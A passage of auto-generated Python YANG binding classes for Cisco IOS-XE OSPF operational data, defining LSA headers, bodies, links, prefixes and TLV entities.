('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
])
self.attached_router = []
self.lsa_net_options = Bits()
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
])
self.metric = None
self.ia_prefix = None
self.ia_prefix_options = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__()
self.yang_name = "ia-router"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
])
self.metric = None
self.destination_router_id = None
self.lsa_ia_options = Bits()
self._segment_path = lambda: "ia-router"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__()
self.yang_name = "lsa-external"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__()
self.yang_name = "nssa"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))])
self._leafs = OrderedDict()
self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal()
self.lsa_nssa_external.parent = self
self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
self._segment_path = lambda: "nssa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__()
self.yang_name = "lsa-nssa-external"
self.yang_parent_name = "nssa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-nssa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-nssa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
class LinkData(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__()
self.yang_name = "link-data"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
])
self.rtr_priority = None
self.link_local_interface_address = None
self.num_of_prefixes = None
self.lsa_id_options = Bits()
self._segment_path = lambda: "link-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
class IaPrefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__()
self.yang_name = "ia-prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
])
self.referenced_ls_type = None
self.referenced_link_state_id = None
self.referenced_adv_router = None
self.num_of_prefixes = None
self._segment_path = lambda: "ia-prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
class Ospfv3Link(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__()
self.yang_name = "ospfv3-link"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.interface_id = None
self.neighbor_interface_id = None
self.neighbor_router_id = None
self.type = None
self.metric = None
self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
class Ospfv3PrefixList(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__()
self.yang_name = "ospfv3-prefix-list"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__()
self.yang_name = "ospfv3-ia-prefix"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
class MultiTopology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__()
self.yang_name = "multi-topology"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
])
self.name = None
self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value)
class Tlv(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, self).__init__()
self.yang_name = "tlv"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])),
('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])),
('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])),
('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])),
('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])),
('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])),
('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])),
])
self.link_type = None
self.link_id = None
self.local_if_ipv4_addr = []
self.local_remote_ipv4_addr = []
self.te_metric = None
self.max_bandwidth = None
self.max_reservable_bandwidth = None
self.unreserved_bandwidth = None
self.admin_group = None
self._segment_path = lambda: "tlv"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value)
class UnknownSubTlv(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__()
self.yang_name = "unknown-sub-tlv"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('value', (YLeafList(YType.uint8, 'value'), ['int'])),
])
self.type = None
self.length = None
self.value = []
self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value)
class AreaScopeLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, self).__init__()
self.yang_name = "area-scope-lsa"
self.yang_parent_name = "link-scope-lsas"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type','adv_router']
self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
])
self.lsa_type = None
self.adv_router = None
self.decoded_completed = None
self.raw_data = []
self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa()
self.ospfv2_lsa.parent = self
self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa()
self.ospfv3_lsa.parent = self
self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"
self.ospfv2_link = YList(self)
self.ospfv2_topology = YList(self)
self.ospfv2_external = YList(self)
self.ospfv3_link = YList(self)
self.ospfv3_prefix = YList(self)
self.ospfv3_ia_prefix = YList(self)
self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)
class Ospfv2Lsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__()
self.yang_name = "ospfv2-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv2-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value)
class Header(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
])
self.lsa_id = None
self.opaque_type = None
self.opaque_id = None
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self.flag_options = Bits()
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
class LsaBody(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))])
self._leafs = OrderedDict([
('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
])
self.num_of_links = None
self.summary_mask = None
self.external_mask = None
self.body_flag_options = Bits()
self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
class Network(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
])
self.network_mask = None
self.attached_router = []
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__()
self.yang_name = "ospfv2-link"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_id','link_data']
self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))])
self._leafs = OrderedDict([
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
])
self.link_id = None
self.link_data = None
self.type = None
self.ospfv2_topology = YList(self)
self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
class Ospfv2Topology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "ospfv2-link"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2Topology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__()
self.yang_name = "ospfv2-external"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
